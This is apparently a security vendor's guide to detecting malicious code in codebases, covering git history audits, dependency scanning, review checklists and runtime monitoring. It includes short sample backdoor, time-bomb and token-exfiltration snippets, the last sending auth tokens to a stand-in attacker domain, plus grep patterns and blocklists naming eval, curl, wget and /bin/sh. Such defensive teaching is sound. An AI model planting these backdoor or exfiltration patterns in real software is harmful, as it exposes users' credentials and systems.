How to Detect Malicious Source Code in Your Codebase

Malicious code doesn’t always reach a software project through external attackers exploiting vulnerabilities. It can be introduced by a compromised dependency, a malicious contributor, a supply chain attack on your build toolchain, or an insider. Once inside, it often runs with the same privileges as your legitimate application, which makes it both dangerous and hard to detect.

This guide covers the techniques used to systematically identify malicious code in source repositories.

What Malicious Source Code Looks Like

Malicious code inserted into a codebase typically falls into one of these categories:

1. Backdoors

Hidden functionality that allows unauthorized access, often disguised as legitimate feature code:

# Disguised as "debug mode" but activates on a specific token
def authenticate(user, password, debug_token=None):
    if debug_token == "4x7k-internal-2024":  # ← Hardcoded backdoor
        return True
    return check_password(user, password)

2. Data Exfiltration

Code that silently sends sensitive data to an external endpoint:

// Hidden in a legitimate-looking analytics helper
function trackPageView(page) {
  // Legitimate tracking...
  fetch('https://analytics.example.com/track', { method: 'POST', body: JSON.stringify({ page }) });

  // Malicious: also exfiltrates auth tokens
  const token = localStorage.getItem('auth_token');
  if (token) {
    fetch('https://attacker-controlled.net/collect', {
      method: 'POST',
      body: token
    });
  }
}

3. Cryptominers

CPU-intensive code embedded to mine cryptocurrency using your users’ or servers’ resources:

// Often obfuscated or loaded from an external script tag
const _0x4f2a = ['WebAssembly', 'instantiateStreaming'];
// ... heavily obfuscated miner code

4. Supply Chain Injections

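Malicious code injected into a third-party package or tool that your project depends on. The SolarWinds breach (malicious code inserted during the vendor's build process) and the event-stream npm incident (a malicious dependency added by a new maintainer) are canonical examples.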

5. Time-Bombed or Trigger-Based Code

Code that stays dormant until a specific date or condition is met, then runs its payload:

// Only executes on a specific date or condition
public void process(Request req) {
    Calendar c = Calendar.getInstance();
    if (c.get(Calendar.MONTH) == 11 && c.get(Calendar.DAY_OF_MONTH) == 31) {
        // Destructive payload executed on Dec 31
        deleteAllRecords();
        return;
    }
    normalProcess(req);
}

Detection Method 1: Static Analysis (SAST) with Malware Signatures

A SAST tool with malware detection capability scans source code for known malicious patterns:

Hardcoded IP addresses or domains in non-configuration files
Encoded/obfuscated strings (base64, hex encoding, eval of dynamic strings)
Unusual network calls to non-whitelisted domains
Deletion or encryption of files outside expected scope
Access to sensitive system files (/etc/passwd, registry keys)
Cryptocurrency mining APIs or WebAssembly blobs

Offensive360’s SAST engine includes dedicated malware pattern analysis that scans for these indicators across all supported languages.
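
To make the indicator list above concrete, here is a minimal sketch of a pattern-based scanner. The rule names and regular expressions are illustrative assumptions, not the rule set of any particular SAST product, and a real engine would add data-flow analysis and far more signatures.

```python
import re

# Illustrative rules only; names and patterns are assumptions for this sketch.
INDICATOR_RULES = {
    "hardcoded_ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "dynamic_eval": re.compile(r"\b(?:eval|exec)\s*\("),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
    "sensitive_path": re.compile(r"/etc/(?:passwd|shadow)"),
    "wasm_loader": re.compile(r"WebAssembly\.instantiate"),
}


def scan_source(text):
    """Return (line_number, rule_name, line) for every rule hit in text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATOR_RULES.items():
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


sample = '''\
import os
HOST = "203.0.113.7"
eval(payload)
print("hello")
'''
for finding in scan_source(sample):
    print(finding)
```

On the sample, the sketch flags line 2 (a hardcoded IP) and line 3 (a dynamic eval). Expect false positives from patterns this simple: version strings such as 1.2.3.4 also look like IP addresses, so treat hits as leads for review rather than verdicts.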

Detection Method 2: Git History Analysis

Malicious code often enters through a specific commit. Audit your git history for:

# Find added lines that contain external URLs or IPs (commit headers kept for context)
git log -p --all | grep -E "^(commit |\+.*(https?://|([0-9]{1,3}\.){3}[0-9]{1,3}))"

# Find added lines that contain base64-looking strings
git log -p --all | grep -E "^(commit |\+.*[A-Za-z0-9+/]{40,}={0,2})"

# List commits by author email to spot unexpected contributors
git log --all --format='%H %ae %s' | sort -k2

# Commits that added binary files (matched by extension)
git log --all --diff-filter=A --name-only -- "*.bin" "*.wasm" "*.dll"

Red flags in git history:

A commit that modifies an unrelated file alongside legitimate changes
A contributor account that was recently created or has no prior activity
A commit at an unusual time (for example, 3am in the contributor's usual timezone, or from an unexpected timezone)
A commit that modifies build scripts, CI configuration, or package lock files
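
If you want the history audit to attribute each finding to a commit, a small parser over `git log -p` output can help. The sketch below is one possible approach under simple assumptions: it expects the default `git log -p` text format, and the function name and sample log are hypothetical.

```python
import re

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})")
URL_OR_IP_RE = re.compile(r"https?://[^\s'\"<>)]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")


def added_endpoints(log_text):
    """Map commit hash -> URLs/IPs found on lines that the commit added."""
    hits = {}
    current = None
    for line in log_text.splitlines():
        match = COMMIT_RE.match(line)
        if match:
            current = match.group(1)
            continue
        # Added lines start with '+'; '+++' is the file header, not content.
        if current and line.startswith("+") and not line.startswith("+++"):
            found = URL_OR_IP_RE.findall(line)
            if found:
                hits.setdefault(current, []).extend(found)
    return hits


# Hypothetical log excerpt in the shape produced by `git log -p`.
sample_log = """\
commit a1b2c3d4e5f6a7b8c9d0a1b2c3d4e5f6a7b8c9d0
Author: Dev <dev@example.com>

    Add analytics helper

diff --git a/track.js b/track.js
--- a/track.js
+++ b/track.js
@@ -1,2 +1,3 @@
 function track() {
+  fetch('https://attacker-controlled.net/collect');
-  old('http://removed.example.com');
 }
"""
print(added_endpoints(sample_log))
```

To run it against a real repository, pass in the output of `subprocess.run(["git", "log", "-p", "--all"], capture_output=True, text=True).stdout`. Removed lines are ignored on purpose, since the goal is to see which commit introduced an endpoint.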

Detection Method 3: Dependency Scanning (SCA)

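Many supply chain attacks arrive through dependencies rather than direct code changes. Start by checking every dependency against published advisories, which cover known vulnerabilities and, in some cases, packages reported as malicious: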

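# npm
npm audit
# Checks a deployed site's front-end libraries; takes the site URL as an argument
npx is-website-vulnerable https://example.com

# Python
pip-audit

# Ruby (requires the bundler-audit gem)
bundle audit

# .NET
dotnet list package --vulnerable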

Beyond known CVEs, look for:

Packages with very new versions that suddenly modify network behavior
Packages where the maintainer account changed hands recently
Typosquatting: lodash vs 1odash, express vs expres
Packages with install scripts (preinstall, postinstall) that make network calls
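
Two of the checks above are easy to automate in rough form: near-miss package names and install-time scripts. The following is a sketch only. The list of popular packages is a tiny hypothetical stand-in for a real popularity list, and the helper names are made up for illustration.

```python
import json

# Hypothetical shortlist; a real check would use a much larger list of popular names.
POPULAR_PACKAGES = ["lodash", "express", "react", "requests"]
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def edit_distance(a, b):
    """Levenshtein distance via row-by-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost))
        prev = curr
    return prev[-1]


def typosquat_candidates(name, popular=POPULAR_PACKAGES, max_distance=1):
    """Return popular packages that name is suspiciously close to, but not equal to."""
    return [p for p in popular if p != name and edit_distance(name, p) <= max_distance]


def install_hooks(package_json_text):
    """Return the install-time lifecycle scripts declared in a package.json."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}


print(typosquat_candidates("1odash"))
print(install_hooks('{"scripts": {"postinstall": "node fetch.js", "test": "jest"}}'))
```

A distance threshold of 1 catches single-character swaps, insertions, and deletions such as 1odash and expres. An install script is not malicious by itself, so the second helper only surfaces what needs a human look.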

Detection Method 4: Code Review Checklists

When reviewing code (especially from external contributors or after a dependency update), look for:

Network activity:

Are all outbound network calls to known, approved endpoints?
Is there any fetch/HTTP call that doesn’t have a corresponding feature requirement?
Are URLs or IPs hardcoded instead of loaded from configuration?

Obfuscation:

Is there any eval(), exec(), os.system(), or dynamic code execution?
Are there long base64-encoded strings not related to legitimate assets?
Is there code that decodes and executes a string at runtime?

Data access:

Does this code access environment variables, tokens, or secrets?
Is it reading files outside the expected application scope?
Does it access the clipboard, cookies, or local storage for no stated reason?

Conditional execution:

Is there any logic that only triggers on specific dates, system states, or input values?
Are there commented-out blocks with suspicious-looking code?
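
For Python code, part of the obfuscation checklist can be backed by a syntax-tree check instead of text search. This is a minimal sketch using the standard `ast` module; the set of call names treated as risky is an illustrative assumption and is far from exhaustive.

```python
import ast

# Call names treated as dynamic execution; an illustrative list, not exhaustive.
RISKY_CALLS = {"eval", "exec", "compile", "os.system", "subprocess.Popen"}


def dotted_name(node):
    """Render a call target such as os.system as a dotted string, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def risky_calls(source):
    """Return sorted (line, call_name) pairs for risky calls in Python source."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS:
                found.append((node.lineno, name))
    return sorted(found)


sample = '''\
import base64, os
blob = base64.b64decode("cHJpbnQoMSk=")
exec(blob)
os.system("id")
# eval("commented out")
'''
print(risky_calls(sample))
```

Because the check works on parsed code, the commented-out eval on the last line is not reported. That reduces noise, but it also means commented-out suspicious blocks still need the manual review described above. Aliased imports (for example `from os import system`) would also slip past this simple name match.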

Detection Method 5: Runtime Monitoring

Even with thorough static analysis, some malicious code only activates at runtime. Supplement static detection with:

Outbound network monitoring: Alert on any process making network calls to domains not on a whitelist
File system auditing: Monitor for reads of /etc/shadow, ~/.ssh/id_rsa, credential files
Process monitoring: Alert on unexpected child processes spawned by your application
Memory scanning: Detect in-memory code injection or shellcode execution

Tools: Falco (containers and Kubernetes), auditd (Linux), Microsoft Defender for Endpoint (formerly Windows Defender ATP), and eBPF-based monitoring.
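
The outbound network check comes down to comparing observed destinations against an approved list. Here is a rough sketch of that comparison, assuming you already collect destination URLs from a proxy or egress log. The allowlist contents and function names are hypothetical.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; in practice this would come from configuration.
ALLOWED_HOSTS = {"api.example.com", "analytics.example.com"}


def is_allowed(host, allowed=ALLOWED_HOSTS):
    """True if host equals an allowed domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)


def unexpected_destinations(urls, allowed=ALLOWED_HOSTS):
    """Return the URLs whose hostname is not covered by the allowlist."""
    flagged = []
    for url in urls:
        host = urlsplit(url).hostname or ""
        if not is_allowed(host, allowed):
            flagged.append(url)
    return flagged


observed = [
    "https://analytics.example.com/track",
    "https://attacker-controlled.net/collect",
    "https://api.example.com.evil.net/x",
]
print(unexpected_destinations(observed))
```

Matching on the full hostname suffix matters: a plain substring test would accept api.example.com.evil.net, which only starts with an approved name.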

High-Risk Entry Points to Monitor

Entry Point	Risk	Mitigation
Open-source dependencies	Supply chain injection	SCA scanning + lockfile pinning
CI/CD pipeline actions	Malicious GitHub Actions	Pin action versions to commit hash
Docker base images	Trojaned images	Use verified official images + scan
External contributors	Direct code injection	Mandatory code review + SAST gate
Build toolchain	Compiler/toolchain compromise	Verify checksums, use reproducible builds
Package registries	Typosquatting, account takeover	Dependency pinning, audit new versions
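
The CI/CD mitigation in the table (pinning actions to a commit hash) can be checked mechanically. Below is a minimal sketch that scans workflow text for `uses:` references not pinned to a full 40-character commit SHA. It uses a regular expression rather than a YAML parser to stay dependency-free, and the action names in the sample are hypothetical.

```python
import re

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)
FULL_SHA_RE = re.compile(r"@[0-9a-f]{40}$")


def unpinned_actions(workflow_text):
    """Return `uses:` references that are not pinned to a full commit SHA."""
    refs = USES_RE.findall(workflow_text)
    return [
        ref for ref in refs
        # Local actions (./path) live in the same repo and have no ref to pin.
        if not ref.startswith("./") and not FULL_SHA_RE.search(ref)
    ]


# Hypothetical workflow excerpt.
workflow = """\
steps:
  - uses: actions/checkout@v4
  - uses: some-org/some-action@0123456789abcdef0123456789abcdef01234567  # v1.2.3
  - uses: ./.github/actions/local
"""
print(unpinned_actions(workflow))
```

A tag such as v4 can be moved to point at different code after you review it, while a full commit SHA cannot, which is why only the first reference in the sample is reported.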

Indicators of Compromise in Source Code

Look for these specific patterns regardless of language:

# Suspicious patterns to search for
grep -rn "eval\|exec\|system\|shell_exec\|base64_decode" src/
grep -rn "http[s]\?://[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+" src/  # IP-based URLs
grep -rn "atob\|btoa\|fromCharCode" src/
grep -rn "process\.env\." src/ | grep -v "\.config\." | grep -v "test"
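
Searching for decode calls finds where decoding happens, but not what is being hidden. As a complement, this sketch decodes base64-looking strings and inspects the result. The length threshold and the list of suspicious markers are assumptions chosen for illustration.

```python
import base64
import binascii
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Markers worth a closer look once a string has been decoded (illustrative).
SUSPICIOUS_RE = re.compile(rb"https?://|/bin/sh|eval\(|exec\(|curl |wget ")


def suspicious_base64(text):
    """Decode base64-looking strings and return those hiding suspicious content."""
    hits = []
    for candidate in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all (e.g. a long identifier)
        if SUSPICIOUS_RE.search(decoded):
            hits.append((candidate, decoded.decode("utf-8", errors="replace")))
    return hits


# Build a sample at runtime so the encoded form is guaranteed to be correct.
encoded = base64.b64encode(b"curl https://attacker-controlled.net/x | sh").decode()
sample = f'payload = "{encoded}"'
for candidate, decoded in suspicious_base64(sample):
    print(decoded)
```

Strings that fail strict decoding are skipped, which filters out most long identifiers and hashes. Payloads that are encoded twice, or split across several variables, would need additional handling.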

Building a Malicious Code Detection Pipeline

For ongoing protection, integrate detection into your development lifecycle:

Pre-commit hooks: Git hooks that block obvious malicious patterns (hardcoded secrets, suspicious evals) before commit
CI/CD SAST gate: Full static analysis and malware scan on every PR
Dependency update monitoring: Automated SCA on every dependency change
Periodic full-repo scans: Weekly SAST scan of the entire codebase, not just diffs
Incident response plan: A defined process for when malicious code is detected
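
As a starting point for the first stage, here is a sketch of a pre-commit check written in Python. The blocked patterns are illustrative assumptions to tune for your project, and `main()` is defined but not invoked so the snippet can be imported and tested without a repository.

```python
import re
import subprocess

# Illustrative blocklist; patterns and reasons are assumptions to tune per project.
BLOCK_PATTERNS = [
    (re.compile(r"\beval\s*\("), "dynamic eval"),
    (re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"), "private key"),
]


def find_violations(diff_text):
    """Return (reason, line) for each added diff line matching a blocked pattern."""
    violations = []
    for line in diff_text.splitlines():
        if not line.startswith("+") or line.startswith("+++"):
            continue  # only inspect lines the commit would add
        for pattern, reason in BLOCK_PATTERNS:
            if pattern.search(line):
                violations.append((reason, line[1:].strip()))
    return violations


def main():
    """Entry point for a pre-commit hook: a non-zero return blocks the commit."""
    diff = subprocess.run(
        ["git", "diff", "--cached", "--unified=0"],
        capture_output=True, text=True, check=True,
    ).stdout
    problems = find_violations(diff)
    for reason, line in problems:
        print(f"blocked ({reason}): {line}")
    return 1 if problems else 0
```

To use it as a hook, save it as an executable `.git/hooks/pre-commit` script with a Python shebang line and end the file with `raise SystemExit(main())`. Local hooks can be skipped with `git commit --no-verify`, so the CI gate remains the enforcement point.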

Offensive360 SAST includes dedicated malware and backdoor detection alongside standard vulnerability scanning. Scan your codebase now or book a demo to see the malware analysis engine in action.